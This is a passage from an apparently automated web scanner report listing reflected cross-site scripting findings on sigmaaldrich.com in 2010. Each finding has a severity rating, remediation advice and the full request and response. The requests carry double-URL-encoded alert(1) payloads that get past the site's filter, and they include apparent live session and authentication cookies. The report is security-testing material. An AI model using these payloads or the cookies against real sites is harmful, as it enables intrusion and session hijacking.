Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:04 GMT
Content-Length: 28987
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contenta4a66";alert(1)//9cf202f2c34/sigma-aldrich/areas-of-interest/materials-science/material-science-products","E404") ;
   </script>
...[SNIP]...

1.133. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/materials-science/material-science-products [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/materials-science/material-science-products

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35aaa%2522%253balert%25281%2529%252f%252f81d2c1ca82c was submitted in the REST URL parameter 2. This input was echoed as 35aaa";alert(1)//81d2c1ca82c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich35aaa%2522%253balert%25281%2529%252f%252f81d2c1ca82c/areas-of-interest/materials-science/material-science-products HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:07 GMT
Content-Length: 28987
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich35aaa";alert(1)//81d2c1ca82c/areas-of-interest/materials-science/material-science-products","E404") ;
   </script>
...[SNIP]...

1.134. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/materials-science/material-science-products [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/materials-science/material-science-products

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 887ee%2522%253balert%25281%2529%252f%252f1d67d16e2c4 was submitted in the REST URL parameter 3. This input was echoed as 887ee";alert(1)//1d67d16e2c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest887ee%2522%253balert%25281%2529%252f%252f1d67d16e2c4/materials-science/material-science-products HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:09 GMT
Content-Length: 28987
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest887ee";alert(1)//1d67d16e2c4/materials-science/material-science-products","E404") ;
   </script>
...[SNIP]...

1.135. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/materials-science/material-science-products [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/materials-science/material-science-products

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2dab%2522%253balert%25281%2529%252f%252f30fc2d7ef7a was submitted in the REST URL parameter 4. This input was echoed as b2dab";alert(1)//30fc2d7ef7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/materials-scienceb2dab%2522%253balert%25281%2529%252f%252f30fc2d7ef7a/material-science-products HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:11 GMT
Content-Length: 28987
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/materials-scienceb2dab";alert(1)//30fc2d7ef7a/material-science-products","E404") ;
   </script>
...[SNIP]...

1.136. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/materials-science/material-science-products [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/materials-science/material-science-products

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12122%2522%253balert%25281%2529%252f%252f6a61c00c995 was submitted in the REST URL parameter 5. This input was echoed as 12122";alert(1)//6a61c00c995 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/materials-science/material-science-products12122%2522%253balert%25281%2529%252f%252f6a61c00c995 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:13 GMT
Content-Length: 28987
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/materials-science/material-science-products12122";alert(1)//6a61c00c995","E404") ;
   </script>
...[SNIP]...

1.137. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/programs [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/programs

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feb37%2522%253balert%25281%2529%252f%252fa7dba31e652 was submitted in the REST URL parameter 1. This input was echoed as feb37";alert(1)//a7dba31e652 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentfeb37%2522%253balert%25281%2529%252f%252fa7dba31e652/sigma-aldrich/areas-of-interest/programs HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
